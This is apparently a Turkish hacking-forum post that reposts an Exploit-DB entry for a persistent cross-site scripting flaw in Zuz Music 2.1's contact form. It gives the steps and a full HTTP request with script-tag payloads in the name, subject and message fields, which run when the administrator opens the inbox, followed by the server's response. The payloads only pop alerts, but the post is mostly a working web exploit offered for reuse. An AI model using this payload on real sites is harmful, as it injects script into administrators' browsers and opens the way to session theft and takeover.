İPUCU

Exploitler Exploit Nedir ? Nasıl Kullanılır Ve Yeni Çıkan Exploitler Hakkında Bilgi ...

Seçenekler

Zuz Music 2.1 - 'zuzconsole/___contact ' Persistent Cross-site Scripting

20-02-2019 20:38
#1
BAGAY - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
07/2014
Nereden:
127.0.0.1
Yaş:
20
Mesajlar:
653
Teşekkür (Etti):
56
Teşekkür (Aldı):
120
Konular:
45
Ticaret:
(0) %
# Exploit Title/Exploit Başlığı:Zuz Music 2.1 - 'zuzconsole/___contact ' Persistent Cross-site Scripting
# Dork: N/A
# CVE: N/A
# Date/Tarih: 14 Şubat 2019
# Exploit Author/Exploit Yazarı: Deyaa Muhammad
# Vendor Homepage/Yapımcı Sitesi: https://zuz.host/
# Software Link/Yazılımın Linki: https://codecanyon.net/item/zuz-musi...ystem/21633476
# Version/Versiyon: 2.1
# Tested on/Test Edilen Sistem: WIN7_x68/Linux

# POC:
1. Buraya gidin https://[PATH]/contact
2. Javascript kodunu yapıştırın.
3. Enjekte edilen bu kod admin mail kutusunu açtığı an çalışmaya başlayacaktır.
https://demos.zuz.host/gmusic/admin/inbox.

# Request/İstek:
POST /gmusic/zuzconsole/___contact HTTP/1.1
Host: server
Connection/Bağlantı: close
Content-Length/Bağlantı Uzunluğu: 155
Accept: application/json, text/plain, */*
Origin: https://demos.zuz.host
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36
Content-Type: application/json;charset=UTF-8
Referer: https://server/gmusic/contact
Accept-Encoding: gzip, deflate
X-XSS-Protection: 0

{"type":"general","name":"<script>alert(0)</script>","mail":"mail@example.com","subject":"<scr ipt>alert(1)</script>","message":"<script>alert(2)</script>"}

#Response/Yanıt

HTTP/1.1 200 OK
Date/Tarih: Cuma, 15 Şubat 2019 01:30:19 GMT
Server: Apache
Connection: close
Content-Type/İçerik Tipi: application/json
Content-Length/İçerik Uzunluğu: 183

{
"kind": "zuz#contactMessageSent",
"etag": "hnwdHsGYwqI6CCSoRSXDMG1BEDTbMMFrOcayLdTYeOs",
"message": "We have recieved your query and will get back to you in 24 hours."
}



Exploit Linki:
https://www.exploit-db.com/exploits/46420
Kullanıcı İmzası
NE MUTLU TÜRK'ÜM DİYENE

Konu BAGAY tarafından (20-02-2019 20:49 Saat 20:49 ) değiştirilmiştir.
ibobaba27 Teşekkür etti.


Bookmarks


« Önceki Konu | Sonraki Konu »
Seçenekler

Yetkileriniz
Sizin Yeni Konu Acma Yetkiniz var yok
You may not post replies
Sizin eklenti yükleme yetkiniz yok
You may not edit your posts

BB code is Açık
Smileler Açık
[IMG] Kodları Açık
HTML-Kodları Kapalı
Trackbacks are Kapalı
Pingbacks are Kapalı
Refbacks are Kapalı